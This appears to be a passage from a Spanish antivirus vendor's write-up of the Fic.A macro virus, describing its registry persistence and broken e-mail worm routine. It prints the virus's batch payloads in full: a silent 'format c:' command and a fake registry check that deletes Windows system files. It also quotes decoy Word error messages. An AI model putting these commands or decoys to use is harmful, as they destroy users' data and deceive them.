HKLM\Software\Microsoft\Windows\CurrentVersion\Run
WinVBS = C:\Windows\System32.vbs

Este script intenta actuar como un gusano de e-mail, y enviarse a través del Microsoft Outlook. Sin embargo, por un error en su código, esto no funciona.

Fic.A también crea el archivo C:\WINDOWS\REG.BAT, el cuál contiene los comandos para formatear la unidad "C:\":

@echo off
ctty nul
format c: /autotest /q /u
Done!!

También elimina el archivo C:\AUTOEXEC.BAT para crear su propio AUTOEXEC.BAT, el cuál ejecutará al archivo REG.BAT anterior:

@echo off
cd ..\windows
reg.bat

El virus tiene previstas que estas acciones ocurran el 1 o el 29 de cada mes. Un error en su código causa que esto ocurra cada vez que el documento sea abierto. Esto significa que reemplazará el AUTOEXEC.BAT original por uno propio, el cuál eliminará archivos específicos del sistema:

@echo off
echo Windows Registry Checking....
echo Started checking registry...
del C:\Windows\Command\Ansi.sys
del C:\Windows\Command\attrib.exe
del C:\Windows\Command\Bootdisk.bat
del C:\Windows\Command\Display.sys
del C:\Windows\Command\Keyboard.sys
del C:\Windows\System\Wsock32.dll
del C:\Windows\System\Wsock2.vxd
del C:\Windows\System\Vmm32.vxd
echo No errors found !

El documento también despliega la siguiente ventana de mensajes:

Microsoft Word
Unable to open the current document. The problem may be connected to kernel32.dll
[   OK   ]

Cuando se pulsa en el botón OK, el documento es cerrado. Además, el ítem "Acerca de Microsoft Word" del menú de ayuda de Word, desplegará el siguiente mensaje:

Microsoft Word
This program performed an ilegal operation at 0x02338288:0x0001002
[  OK  ]

Fuente: Computer Associated